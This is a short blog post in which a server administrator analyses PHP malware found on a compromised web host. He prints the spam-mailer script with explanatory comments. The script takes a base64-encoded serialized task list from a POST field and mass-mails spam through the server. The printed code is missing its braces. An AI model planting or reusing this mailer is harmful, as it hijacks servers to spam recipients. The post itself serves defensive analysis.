PHP malicious code analysis no. 1

I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.

if (isset($_POST['task']))
	// be sure to display all PHP errors
	ini_set('display_errors', TRUE);
	// disable default PHP memory limit
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	// get serialized array from POST var named task
	// example array structure: array(array('to'=>'', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
	// now send half a million of viagra & cialis related mails... 
	foreach ($x as $arr)
		echo $arr['to']."\r\n";
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	exit('SEND OK');

I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!

Published by

Konrad Fedorczyk

Konrad Fedorczyk

I'm interested in programming and gamedev. I especially luv HTML5 and everything connected to web technologies.

Leave a Reply

Your email address will not be published. Required fields are marked *